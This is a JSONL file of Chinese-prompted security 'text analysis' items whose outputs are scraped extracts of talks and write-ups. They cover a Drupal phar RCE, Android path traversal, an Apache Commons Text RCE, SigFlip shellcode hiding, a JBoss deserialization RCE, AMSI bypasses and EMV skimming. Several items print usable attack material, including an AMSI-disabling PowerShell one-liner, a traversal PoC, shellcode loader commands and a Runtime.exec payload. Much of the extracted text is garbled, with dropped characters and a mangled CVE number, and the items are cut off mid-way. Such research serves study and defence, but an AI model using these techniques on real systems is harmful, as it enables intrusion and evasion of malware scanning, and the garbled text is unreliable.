Vendors Vendors Breach Citrix F5 Imperva NetContinuum WebScurity 12 Structure Structure Host Based  Web Server module/plugin  Special program compiler Network Based  Appliance  Deployed as Reverse Proxy In-Line Mode Web Traffic Monitor  SSL Handshaking 13 WAF WAF v.s v.s Network Firewall Network Firewall WAF WAF Protect at Layer 7 Check http/s data Block http/s traffic with malicious attack Decrypt https packets Inspect http/html Network Firewall Network Firewall Protect at Layer 3 check IP and PORT Always allow http/s traffic even with malicious attack Unable to decrypt https packet No action to http/html 14 WAF WAF v.s v.s IDS/IPS IDS/IPS WAF WAF Positive Security Model Behavior Modeling Fully SSL decryption Tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOff Grid communications with Android Meshing the mobile world Josh m0nk Thomas The MITRE Corporation Bedford, MA USA jbthomas@mitre.org Jeff Stoker Robble The MITRE Corporation Bedford, MA USA jrobble@mitre.org The SPAN project is an open source implementation of a generalized Mobile Ad-Hoc Network framework. The projects goals are to bring dynamic mesh networking to smart phones and to explore the concepts of Off-Grid communications. Keywords: MANET; OLSRd; Mesh Network; Android; Decentralized; Peer to Peer; Smartphone I. INTRODUCTION TO SPAN Recent worldwide events have showcased that our current communications infrastructure is not as reliable as we would like to believe. Cellular towers can be destroyed by natural phenomena or simply overloaded beyond capacity and Wi-Fi hotspots are reliant on power and network connectivity, two things in short availability during a disaster or catastrophic event. Weve seen these issues surface time and time again over the past years, from Katrina to Haiti to Fukushima. It's always the same problem: no connectivity and no communication. The SPAN project (Smart Phone Ad-Hoc Networks) attempts to ameliorate these issues by providing an alternate means for information dispersal. The project utilizes MANET (Mobile Ad-Hoc Network) technology to provide a resilient backup framework for communication between individuals when all other infrastructure is unavailable or unreliable. The MANET based solution is a headless, infrastructure-less network that allows common smart phones to link together in a dynamic way. The SPAN project is harnessing the ubiquity of smart phones to provide durable communications. The MITRE based SPAN team has created an open source framework for implementing MANET networks that will be released to the public in late summer. The framework provides not only a full proof of concept implementation of a functional MANET but also allows for plug and play of custom routing protocols. The routing protocols are the true", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Drupal 远程代码执行漏洞CVE-2019-6339 * 影响软件Drupal * 方式phar反序列化RCE * 参考链接[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) * 效果任意命令执行 ## 漏洞环境 执行如下命令启动drupal 8.5.0的环境 ```bash docker compose up -d ``` 环境启动后访问 `http://your-ip:8080/` 将会看到drupal的安装页面一路默认配置下一步安装因为没有mysql环境所以安装的时候可以选择sqlite数据库 ## 漏洞复现 如下图所示先使用管理员用户上传头像头像图片为构造好的 PoC参考[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC ![1](1.png) Drupal 的图片默认存储位置为 `/sites/default/files/pictures/<YYYY-MM>/`默认存储名称为其原来的名称所以之后在利用漏洞时可以知道上传后的图片的具体位置 访问 `http://127.0.0.1:8080/admin/config/media/file-system`在 `Temporary directory` 处输入之前上传的图片路径示例为 `phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg`保存后将触发该漏洞如下图所示触发成功 ![2](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Firefox Extensions Defcon17 US, Las Vegas Roberto Suggi Liverani Nick Freeman WTF Are We?  Roberto Suggi Liverani  Senior Security Consultant  Security-Assessment.com  OWASP NZ Leader  http://malerisch.net  Nick Freeman  Security Consultant  Security-Assessment.com  http://atta.cked.me  Contact us  Roberto.suggi@security-assessment.com  Nick.freeman@security-assessment.com Agenda  Introduction  Security threats and risks  Disclosure summary  Abusing Extensions  a selection of exploits and demos Introduction  What are Firefox extensions?  Its just software  Equivalent of ActiveX  What extensions do?  Extend, modify and control browser behaviour  Provides extended/rich functionality and added features  Different type of Firefox addons  Extensions  Plugins (Search Engine plugins) and Themes 5 XUL: - provides UI to extensions - combined with JavaScript, CSS, HTML elements -.xul file XBL: - allows creation of new widgets - combined with CSS, XML and XUL XPConnect: - middle layer allows JavaScript to interface with XPCOM XPCOM: - reusable components/interfaces - interact with low layer libraries: network, I/O, file system, etc. Chrome:  privileged browser zone  code fully trusted Extension Security Model  Mozilla extension security model is nonexistent  Extension code is fully trusted by Firefox  Vulnerability in extension code might result in full system compromise  No security boundaries between extensions  An extension can silently modify/alter another extension  XPCom C++ components subject to memory corruption  Extensions vulnerabilities are platform independent  Lack of security policies to allow/deny Firefox access to internal API, XPCom components, etc  Any Mozilla application with the extension system is vulnerable to same class of issues (e.g. Thunderbird) The potential  Statistics  Firefox Browser Market Share  Beyond 20% globally since November 2008, more than 50% in certain regions/countries  Source: Marketshare - marketshare.hitslink.com Extension do", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGeneral ways to find and exploit directory traversals on Android Xiang Xiaobo (Elphet) @ 360 Alpha Team About Us  Alpha Team @360 Security  100+ Android vulnerabilitiesGoogle Qualcomm etc  Won the highest reward in the history of the ASR program.  5 Pwn contest winner  Pwn2Own Mobile 2015( Nexus 6)  Pwn0Rama 2016 (Nexus 6p)  Pwn2Own 2016(Chrome)  PwnFest 2016(Pixel)  Pwn2Own Mobile 2017(Galaxy S8 Agenda  Concept and Impacts  Where and how to find directory traversal issues  Tricks for exploiting  How to fix What is directory traversal  A controllable or partially controllable file name.  Lack of file name canonicalization  Can be exploited with a malfored filename:  ../../../../../../data/data/com.vulnerable.app/files/plugin.so Impacts of traversal  Arbitrary file reading via traversal  Information leakage ( token, user info, etc. )  Clone Attack  Arbitrary file Writing  Phishing  Denial of Service  Account Replacement  Arbitrary code execution  Clone Attack Agenda  Concept and Impacts  Where and how to find directory traversal issues  Tricks for exploiting  How to fix Where to find Directory traversal  Opening file in exported content provider  Attachment saving in mailbox application  Manually decompressing archives in Web-browser/File Manager  Downloading and unzipping resources during running  Unsafe unzipping files in the SD Card  Transferring files in Instant Messaging Apps  Syncing files in Cloud Drive Apps  Backup and restore   Directory traversal in exported Content provider  exported:true  Overrided openFile method in the content provider  Vulnerable code snippet  PoC:  adb shell content open content://mydownloadcontentprovider/..%2f..%2f..%2f..%2f..%2fsdcard%2freadme.t xt Attachment saving in mailbox apps  There are two fields that must be canonicalized  Filename1 specifies the attachment name for gmail  Filename2 specifies the attachment name for outlook  We can specify these fields with a python script Attachment saving in mailbox apps Zip decompress in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSteele, Patten, and Kottmann Black Hat Go Go Programming for Hackers and Pentesters Go Programming for Hackers and Pentesters Black Hat Go explores the darker side of Go, the popular programming language revered by hackers for its simplicity, efficiency, and reliability. It provides an arsenal of practical tactics from the perspective of security prac- titioners and hackers to help you test your systems, build and automate tools to fit your needs, and improve your offensive security skillset, all using the power of Go. Youll begin your journey with a basic over- view of Gos syntax and philosophy and start to explore examples that you can leverage for tool development, including common network protocols like HTTP, DNS, and SMB. Youll then dig into various tactics and problems that pen- etration testers encounter, addressing things like data pilfering, packet sniffing, and exploit development. Youll create dynamic, pluggable tools before diving into cryptography, attack- ing Microsoft Windows, and implementing steganography. Youll learn how to:  Make performant tools that can be used for your own security projects  Create usable tools that interact with remote APIs  Scrape arbitrary HTML data  Use Gos standard package, net/http, for building HTTP servers  Write your own DNS server and proxy  Use DNS tunneling to establish a C2 channel out of a restrictive network  Create a vulnerability fuzzer to discover an applications security weaknesses  Use plug-ins and extensions to future-proof products  Build an RC2 symmetric-key brute-forcer  Implant data within a Portable Network Graphics (PNG) image. Are you ready to add to your arsenal of secu- rity tools? Then lets Go! About the Authors Tom Steele, Chris Patten, and Dan Kottmann share over 30 years in penetration testing and offensive security experience, and have deliv- ered multiple Go training and development sessions. (See inside for more details.) Everything necessary to get started with Go development in the securit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll your Sploits (and Servers) are belong to us. Echelon One Executive Security Intelligence We are: David Mortman CSO in Residence, Echelon One Rich Mogull Securosis Chris Hoff Unisys Robert \"RSnake\" Hansen CTO, SecTheory Robert Graham CTO, Errata Security David Maynor CTO, Errata Security 04/04/2008 Echelon One, LLC 3 Thanks! Q&A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Apache Commons Text RCE(CVE-OLOO- QOWWX) 漏洞分析 漏洞复现 漏洞防御 漏洞详细https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 根据中提到的 lookups 可以定位到 InterpolatorStringLookup#lookup 法 漏洞分析 2 第5将 : 的第次出现的下标赋给 prefixPos如果 prefixPos 于 0则会将 : 前半部分赋给 prefix(此处会进写处理)后半部分赋给 name 接着在 stringLookupMap 查看是否存在对应的键名如果存在则会调 StringLookup#lookup 法 这些 lookups 可以在 org.apache.commons.text.lookup.DefaultStringLookup 中查看 public String lookup(String var) { if (var == null) { return null; } else { int prefixPos = var.indexOf(58); if (prefixPos >= 0) { String prefix = toKey(var.substring(0, prefixPos)); String name = var.substring(prefixPos + 1); StringLookup lookup = (StringLookup)this.stringLookupMap.get(p refix); String value = null; if (lookup != null) { value = lookup.lookup(name); } if (value != null) { return value; } var = var.substring(prefixPos + 1); } return this.defaultStringLookup != null ? this.defaultStringLookup .lookup(var) : null; } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 Java 复制代码 3 中说明可以使 script 进命令执查看 ScriptStringLookup#lookup 法 4 SPLIT_STR 为 : 将其再划分为两部分接着会将这两部分分别赋给 engineName 和 script其中 engineName 是在 (new ScriptEngineManager()).getEngineByName(engineName) 进调 的这 engineName 是赋值 js然后 script 是在 scriptEngine.eval(script) 进调代码 执这可以使 java.lang.Runtime.getRuntime().exec(\\\"calc\\\") 最后 Payload 如 下 其他 lookup 可分析利 public String lookup(String key) { if (key == null) { return null; } else { String[] keys = key.split(SPLIT_STR, 2); int keyLen = keys.length; if (keyLen != 2) { throw IllegalArgumentExceptions.format(\"Bad script key format [%s]; expected format is EngineName:Script.\", new Object[]{key}); } else { String engineName = keys[0]; String script = keys[1]; try { ScriptEngine scriptEngine = (new ScriptEngineManager()).ge tEngineByName(engineName); if (scriptEngine == null) { throw new IllegalArgumentException(\"No script engine n amed \" + engineName); } else { return Objects.toString(scriptEngine.eval(script), (St ring)null); } } catch (Exception var7) { t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x0000 a great fool in my life i have been i have squandered 'til pallid and thin hung my head in shame and refused to take blame for the darkness i know i've let win j knapp VulnCatcher: Fun with Programmatic Debugging atlas atlas@r4780y.com http://atlas.r4780y.com 0x0001 Who am I  Scattered past in computing  Insecurity Researcher  Captain 1@stplace  Father/Husband  Curious fellow (sleepless too) 0x0100 Programmatic Debugging  Debugging other processes from your (my) favorite language  Accessing and Influencing CPU and Memory state of a process in a programmatic fashion  Logic and other language constructs 0x0101 Explosion  Several key programmatic debuggers:  PyDBG  Pedram (part of Pai Mei)  Immunity Debugger  Immunity Sec  Vtrace  Invisigoth (Vivisect)  NoxDbg  Lin0xx (first Ruby debugger) (This talk will focus on Vtrace) 0x0102 What can we do?  Live Patching? Fun with Hex  LivePatch  Live Dumping?  LiveOrganTransplant  Process Grep?  Visi's memgrep  Vampyre Jack SSHD  In progress by drb and myself 0x0103 What can we do?  everything else that GDB or Olly can do, only better  interactive python debugger  especially nice with searchMemory() and traceme()  automate frame interpretation  what do you want to do? 0x0200 Vulnerabilities  what can we do to encourage vulns to suddenly appear?  fuzzing on its own is so ghetto!  rather, what can we watch/do to catch indications of vulnerability? 0x0300 Buffer Overflows?  custom Breakpoints at key functions  at break:  Stack-Analysis for Parameters  Buffer-Analysis for Size  more empirical than static analysis 0x0301 vtrace attach from vtrace import * me = getTrace() me.attach(<pid>) me.addBreakpoint(MemcpyBreaker(me)) me.setMode(\"RunForever\", True) me.run() 0x0302 memcpy()  memccpy()/mempcpy()/memmove()  check length of dest (%ESP + 0x4)  HEAP (dlmalloc), check length field immediately before the pointer to the dest  heapptr  4  not always accurate.... copying partial chunks  Stack, check distance to RET  (%ebp + 4)  dest ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSigFlip原理将数据隐写到已签名的PE文件上 Github地址: https://github.com/med0x2e/SigFlip 可以怎么玩呢可以白加黑当冲锋马的时候白文件写入shellcode黑文件加载白文件的shellcode 也可以做维权使用将shellcode注入到系统的白文件中,dll劫持或者loader加到启动项里面 使用 两个目录 Bof 和 DotNet DotNet是c#写的用来可行性测试包含注入代码loader加载功能Bof是C 写的也包含注入代码和loader加载功能主要是可以编译成bof文件给Cobalt Strike使用 c#代码loader的部分直接CreateRemoteThread就运行shellcode了而bof的loader部分使用 Early Bird 启动一个新进程 pac注入执行 c#和Bof会写入 \"\\xFE\\xED\\xFA\\xCE\\xFE\\xED\\xFA\\xCE\" 当作标记在读取shellcode时通过这个字符 就可以直接定位到shellcode了 注入shellcode到签名的PE文件 loader执行shellcode 说说原理一句话就是将shellcode写到了签名时不计算的区域 签名的位置 https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#optional-header-data-direct ories-image-only c:\\> SigFlip.exe -i C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -s C:\\Temp\\x86.bin -o C:\\Temp\\MSbuild.exe -e TestKey c:\\> SigLoader.exe -f C:\\Temp\\MSBuild.exe -e TestKey -pid <PROCESS_ID> _IMAGE_DATA_DIRECTORY 第4个偏移的位置从0开始 签名信息的结构 https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-attribute-certificate-tabl e-image-only 值 信息 Win32 SDK中的宏定义名 0x0100 Win_Certificate的老版本 WIN_CERT_REVISION_1_0 0x0200 Win_Certificate的当前版本 WIN_CERT_REVISION_2_0 灰色背景的部分不参与签名的hash计算粗体的部分就是签名的相关内容 SigFlip的原理就是将数据隐写到灰色的部分 数字签名结构 WIN_CERTIFICATE dwLength:此结构体的长度 wRevision:在bCertificate里面保护的证书的版本号版本号有两种如下表一般为0x0200 wCertificateType:证书类型有如下表格中的类型 typedef struct _WIN_CERTIFICATE { DWORD dwLength; WORD wRevision; WORD wCertificateType; // WIN_CERT_TYPE_xxx BYTE bCertificate[ANYSIZE_ARRAY]; } WIN_CERTIFICATE, *LPWIN_CERTIFICATE; 值 信息 Win32 SDK中的宏定义名 0x0001 X.509证书 WIN_CERT_TYPE_X509 0x0002 包含PKCS#7的SignedData的结构 WIN_CERT_TYPE_PKCS_SIGNED_DATA 0x0003 保留 WIN_CERT_TYPE_RESERVED_1 0x0004 终端服务器协议堆栈证书签名 WIN_CERT_TYPE_TS_STACK_SIGNED bCertificate:包含一个或多个证书一般来说这个证书的内容一直到安全表的末尾 具体的 WIN_CERT_TYPE_PKCS_SIGNED_DATA 结构参考 https://download.microsoft.com/download/9/ c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/Authenticode_PE.docx 最值得注意的是 bCertificate 的字节大小要求8字节对齐 修改要做的步骤 根据_IMAGE_DATA_DIRECTORY 获取 WIN_CERTIFICATE 的RVA和大小添加数据到 bCertificate 后 面再注意8字节对齐即可 Ps:为什", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 jboss jboss RPC RCE 分析 JDNI 2022年42713:28:14 看到个帖提到jboss 漏洞就去Twitter找了链接 https://jspin.re/jboss-eap-as-6-rce-a-little-bit-beyond-xac-xed/ https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf 简单分析了下pdf的内容漏洞不是传统的http漏洞是jboss的remoting3存在问题可参考 weblogic的T3只是jboss是跑在独的端上 4446: JBoss Remoting Unified Invoker 3873: EJB Remoting Connector 早期版本端是4445存在cve-2016-3690 反序列化漏洞versions <= 5 jboss RPC RCE 分析 2 新版本的4446和3873跑的是Remoting 3但没有说明档作者只好编写代码动测试抓包来分析 依赖如下 3 测试代码 pom.xml XML 复制代码 <dependency> <groupId>org.jboss.remoting</groupId> <artifactId>jboss-remoting</artifactId> <version>2.4.0.GA</version> </dependency> <dependency> <groupId>org.jboss.logging</groupId> <artifactId>jboss-logging</artifactId> <version>3.3.0.Final</version> </dependency> <dependency> <groupId>org.jboss</groupId> <artifactId>jboss-common-core</artifactId> <version>2.5.0.Final</version> <exclusions> <exclusion> <groupId>org.jboss.logging</groupId> <artifactId>jboss-logging-spi</artifactId> </exclusion> </exclusions> </dependency> <dependency> <groupId>concurrent</groupId> <artifactId>concurrent</artifactId> <version>1.3.4</version> </dependency> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 Java 复制代码 InvokerLocator locator = new InvokerLocator(\"socket://30.1.20.3:4446\"); Client remotingClient = new Client(locator, \"ALLIGATOR\"); remotingClient.connect(); System.out.println(remotingClient.invoke(\"RECIFE\")); 1 2 3 4 4 看到ACED就很亲切了通过ACED0005交互然后Client发送payload这个和我们般发送的反序列 化payload格式有所区别没有ACED头章中解释了头部字段含义这个之前做反序列化脏数据也涉 及到过PS: 这可以看到建连接后server端会主动发送ACED0005然后client交互 ACED0005在发送payload 0x77011679 参考java/io/ObjectStreamConstants.java Java 复制代码 0x77: TC_BLOCKDATA 0x01: Length of TC_BLOCKDATA 0x16: Protocol version 22 0x79: TC_RESET (??) 1 2 3 4 5 然后和yso成的payload可以对下其实就是前4字节不同后续应该就是序列化数据所以我们可 以尝试替换前四字节然后发送利 6 这就yso成个然后发送利数据包如下 7 这个接应该是RPC那么应该可以像T3那样注册法然后invoke调待后续不过漏洞验证还可 以sleep来测试 8 PS:4446和3873端均可利 中还提到了条jboss原的反序列化利链ProducerManagerImpl很直观的条JNDI利链 编写构造如下本地测试可成功 JDNI 9 进步", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass AMSI的前世今生(1) - AMSI前置知识 0x00 前言 Bypass AMSI的前世今生是 [公鸡队之家] 知识星球的第一个专项技术分享之所以选择这个主题作 为第一个主题是因为AMSI是微软用来对抗无文件攻击而开发的安全模块是当前攻防对抗前沿的技术 之一从15年AMSI出现越来越多的杀软厂商接入了AMSI接口当前市面上主流杀软均接入此接口 这给当时以powershell为主的红队工具致命打击因此随后红队人员针对Bypass AMSI的研究从未停 止从开始的script混淆到现在的内存补丁详细的技术演变如下 [BA1] 降级PowerShell版本到2.0依赖于.Net 3.0Windows 10 默认不预装 [BA2] 混淆攻击脚本 [BA3] 使用一行命令关闭AMSI针对这一行命令本身使用混淆绕过对抗AMSI检测 [BA4] 设置注册表HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable设置为 0 以禁用 AMSI [BA5] 卸载当前进程中的amsi.dll [BA6] PowerShell.exe同目录下放入傀儡amsi.dll劫持正常amsi.dll正常amsi.dll存在于 c:\\windows\\system32\\amsi.dll [BA7] Null字符绕过 [BA8] COM Server劫持劫持杀软接入接口 [BA9] 内存补丁技术 以上技术从不同角度在AMSI调用流程的不同环节上实施针对以上对抗技术为了后文方便引用使用 [BA1-9]的编号方式进行编号攻防相生在对抗的过程中微软也对其中一些技术进行了缓解和修 补例如 Windows 10 1709以后如果AMSI提供程序依赖于同目录下其他DLL同时加载将不能工作 Windows 10 1903以后AMSI提供商DLL没有Authenticode-signed可能将不能加载这个取决 于注册表Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\FeatureBits的值 默认0x01,签名检测被禁止也就是说微软增加了这个功能但没有默认开启 提醒杀软监控注册表HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable的值 总体来说由于AMSI仅仅是一个连接应用程序和杀软程序的通道微软主要还是在defender上做各种 对抗针对通道本身的加固较少 当然除了对抗以外红队工具也寻找了另外一条出路就是.Net使用C#开发的红队工具随之兴起在攻 防博弈中直接对抗往往不是性价比最高的方向错位对抗才是能够保持红队技术具有一定领先性最好 的办法 随着以.NET(C#)为基础的攻击技术的逐渐成熟AMSI在.NET 4.8引入了针对Assembly导入的内存扫描 同时针对WMI的扫描也被加入到了AMSI当中 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('a msiInitFailed','NonPubilc,Static').SetValue($null,$true) No. 1 / 5 0x01 什么是AMSI AMSI全称Antimalware Scan Interface反恶意软件扫描接口他的本体是一个DLL文件存在于 c:\\windows\\system32\\amsi.dll它提供了通用的标准接口COM接口Win32 API这些接口中 Win32 API是为正常应用程序提供的方便正常程序调用这些API针对用户输入做扫描其中的COM接 口是为杀软供应商提供的方便杀软厂商接入自身针对恶意软件的识别能力官方的架构图很清晰的 表明了AMSI的作用如图所示 WIN32 API 如下根据查询amsi.dll记录 AmsiCloseSession AmsiInitialize AmsiOpenSession AmsiScanBuffer AmsiScanString AmsiUacInitialize AmsiUacScan AmsiUacUninitialize AmsiUninitialize 和官方文档中给的API有点出入的是关于UAC相关的扫描具有单独的接口我们重点关注的也就是 AmsiScanBufferAmsiScanStringAmsiUacScan这3个函数 No. 2 / 5 COM 接口如下省略部分接口 IAmsiStream IAntimalware IAntimalwareProvider 0x03 AMSI在Windows中的整合情况 AMSI在windows系统中被直接或", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nChip & PIN is definitely broken Credit Card skimming and PIN harvesting in an EMV world Andrea Barisani <andrea@inversepath.com> Daniele Bianco <daniele@inversepath.com> Chip & PIN is definitely broken  v1.4 Copyright 2011 Inverse Path S.r.l. Adam Laurie <adam@aperturelabs.com> Zac Franken <zac@aperturelabs.com> What is EMV? EMV stands for Europay, MasterCard and VISA, the global standard for inter-operation of integrated circuit cards (IC cards or \"chip cards\") and IC card capable point of sale (POS) terminals and automated teller machines (ATMs), for authenticating credit and debit card transactions. IC card systems based on EMV are being phased in across the world, under names such as \"IC Credit\" and \"Chip and PIN\". Source: Wikipedia Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.4 Why EMV?  ICC / smartcard  improved security over existing magnetic stripe technology  offline card verification and transaction approval  multiple applications on one card Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.4 Liability shift  liability shifts away from the merchant to the bank in most cases (though if merchant does not roll EMV then liability explicitly shifts to it)  however the cardholders are assumed to be liable unless they can unquestionably prove they were not present for the transaction, did not authorize the transaction, and did not inadvertently assist the transaction through PIN disclosure  PIN verification, with the help of EMV, increasingly becomes proof of cardholder presence Copyright 2011 Inverse Path S.r.l. Chip & PIN is definitely broken  v1.4 Liability shift  VISA Zero Liability fine print (US): Does not apply to ATM transactions, PIN transactions not processed by Visa, or certain commercial card transactions. Individual provisional credit amounts are provided on a provisional basis and may be withheld, delayed, limited, or rescinded by your issuer based on factors such as gross negligence or fraud, delay in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npocassist浅析 author: https://github.com/Ciyfly pocassist浅析 项目代码目录 流程图 cmd/pocassist.go 整个程序启动入口 init RunApp RunServer InitAll 加载配置文件 下面是所有的配置展开 conf.Setup() 加载全局配置文件 logging.Setup() 加载日志配置文件 db.Setup() 加载db配置文件 routers.Setup() 配置web util.Setup() 限流初始化 fasthttpclient jwt secret 初始化 rule.Setup() 规则配置相关初始化 ExecScriptHandle 是poc/script下的poc Handler函数 ExecExpressionHandle 是db中的yaml的类似xray格式的poc Handler函数 InitTaskChannel 任务管道 HotConf 配置热加载 routers.InitRouter 初始化web的路由并启动 db文件 创建一个扫描任务 GenOriginalReq 生成一个原始请求 rule.TaskProducer 将taskitem写到TaskChannel管道里 rule.TaskConsumer() 消费TaskChannel管道里的数据调用poc测试 RunPlugins 协程限制并发运行插件 rule.RunPoc 运行poc celController.Init cel控制器初始化 celController.InitSet cel控制器初始化 controller.Next() ExecExpressionHandle controller.Groups 含有 Groups的poc执行 controller.Rules 含有 Rules的poc执行 controller.SingleRule 单条rule怎么执行 controller.DoSingleRuleRequest fasthttp发请求 raw接口 List 对于cel-go的使用理解 参考 项目代码目录 .  api # web api的接口路由   middleware    jwt    jwt.go   msg    msg.go   routers   route.go   ui.go   v1   auth    auth.go   plugin    plugin.go   scan    result     result.go    scan     scan.go    task    task.go   vulnerability    vulnerability.go   webapp   webapp.go  cmd # 入口程序   pocassist.go  config.yaml # 全局配置  go.mod  go.sum  LICENSE  logs   pocassist.log  main.go  pkg # 核心代码 cel 解析 反连   cel    cel.go    proto     http.pb.go     http.proto    reverse    reverse.go   conf    config.go    default.go   db    auth.go    conn.go    plugin.go    scanResult.go    scanTask.go    vulnerability.go    webapp.go   file    file.go   logging    log.go   util   jwt.go   rand.go   request.go   request_test.go   result.go   tcp.go   util.go   version.go  poc   rule # 处理poc的等    cel.go    content.go    controller.go # 核心控制    handle.go    parallel.go    request.go    rule.go    run.go   scripts   poc-go-dedecms-bakfile-disclosure.go   poc-go-ecshop-anyone-login.go   poc-go-elasticsearch-path-traversal.go   poc-go-exim-cve-2017-16943-uaf.go   poc-go-exim-cve-2019-15846-rce.go   poc-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Hacker Pimps The Hexagon Security Group Creating Unreliable Systems Attacking the Systems that Attack You Sysmin Sys73m47ic & Marklar From: The Hacker Pimps The Hacker Pimps The Hexagon Security Group Document Versioning  For a copy of this presentation visit:  www.hackerpimps.com/docs.html The Hacker Pimps The Hexagon Security Group Warning!!!  Some of the techniques discussed in this presentation can be hazardous to your personal freedoms.  Mainly the staying out of jail part  Everything discussed in this presentation is strictly theoretical ;) The Hacker Pimps The Hexagon Security Group Why?  Why do we want to create unreliable systems? Isn't that the opposite of what we are supposed to do?  Don't people get paid to make systems reliable?  Unreliable systems can not be counted on. The Hacker Pimps The Hexagon Security Group Technology Changes Everything  We do not have new problems, we have new technology.  We seem to love having our freedoms taken away, just because things are cool or convenient.  Companies and the Government are finding newer more sneaky ways to get your information. The Hacker Pimps The Hexagon Security Group A Presumptive Right To Privacy? Why not presume the right/need for privacy? The number one excuse: I've got nothing to hide! This is the comfortable position of those who are not marginalized. The Hacker Pimps The Hexagon Security Group Are you: In great pain and unable to legally manage pain? Gay and in the military? Needing to express unpopular views that would otherwise risk your safety? A whistle blower? A security researcher? The Hacker Pimps The Hexagon Security Group Privacy I don't care that X is watching me. I'm not doing anything wrong! Who might X be? The Hacker Pimps The Hexagon Security Group The Executive Branch The Hacker Pimps The Hexagon Security Group The Other Executive Branch The Hacker Pimps The Hexagon Security Group The Imaginary Judicial Branch The Hacker Pimps The Hexagon Security Group The Other Imaginary Jud", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMainframe Surrogat Chains By Jake Labelle <jake.labelle@hotmail.co.uk> 08/08/2020 Who Am I  Jake Labelle  Associate Security Consultant at F-Secure  Been on a couple Mainframe Jobs (not a expert)  Streaming from Basingstoke, UK  Was going to put a picture but just look to the right z/OS High Level  Mainframe operating System  Datasets  REXX  JCL  RACF  OMVS DATASETS  USER01.REXXLIB(HELLO)  FLAT FILESYSTEM  APOSTROPHES  PDS (MEMBERS) REXX  SCRIPTING LANGUAGE  ADDRESS  OUTTRAP /*rexx*/ DATASET_TEST = USER2.TEST address TSO LISTDSD DATASET_TEST JCL  JOB CONTROL LANGUAGE  BATCH JOB  JOB CARD - USER=X //USER1K JOB 'EXAMPLE',NOTIFY=&SYSUID,USER=\"id\",MSGCLASS=H //TSOCMD EXEC PGM=IKJEFT01\" //SYSTSPRT DD SYSOUT=*\" //SYSTSIN DD *\" EXEC 'GATOR.GATOR' '\"oldid\"'\" //* JCL IN A REXX /*REXX*/ PARSE ARG id ',' oldid QUEUE \"//\"id\"K JOB 'RECURSE',NOTIFY=&SYSUID,USER=\"id\",MSGCLASS=H,\" QUEUE \"// MSGLEVEL=(1,1)\" QUEUE \"//TSOCMD EXEC PGM=IKJEFT01\" QUEUE \"//SYSTSPRT DD SYSOUT=*\" QUEUE \"//SYSTSIN DD *\" QUEUE \"EXEC 'GATOR.GATOR' '\"oldid\"'\" QUEUE \"//*\" QUEUE \"$$\" o = OUTTRAP(\"output.\",,\"CONCAT\") \"SUBMIT * END($$)\" o = OUTTRAP(OFF) OMVS  UNIX SUBSYSTEM  LIKE WSL  RACF MANAGES SECURITY RACF  Resource Access Control Facility  DIFFERENT TYPES OF RESOURCES E.G DATASETS, SURROGATS  RESOURCE OWNERS  UACC  PERMIT  SPECIAL = ROOT SURROGAT  RACF RESOURCE  *.SUBMIT  BPX.SRV.*  DFHSTART.*  READ ACCESS SURROGAT CHAINS  LOTS OF USERS  WHO KNOWS WHAT THEY WERE FOR  RUNNING FOR DECADES  USER1  USER2  USER3  RLIST SURROGAT *  USER1 CANT SEE USER2  USER3  *.SUBMIT IS A BATCH JOB  COULD MANUALLY SUBMIT REVERSE SHELLS BUT SEE POINT 1  COULD USE A USER WITH READ ACCESS TO ALL RESOURCES (SPECIAL) GATOR  BEGIN.REXX  GATOR.REXX  SUBM.REXX  UNIXM.REXX  PLUGINS.REXX BEGIN.REXX  GETS OUTPUT DATASETS READY  GETS UNIX FILES READY  ADDS CURRENT USER TO PATH  STARTS GATOR.REXX GATOR.REXX  GETS PATH  IF 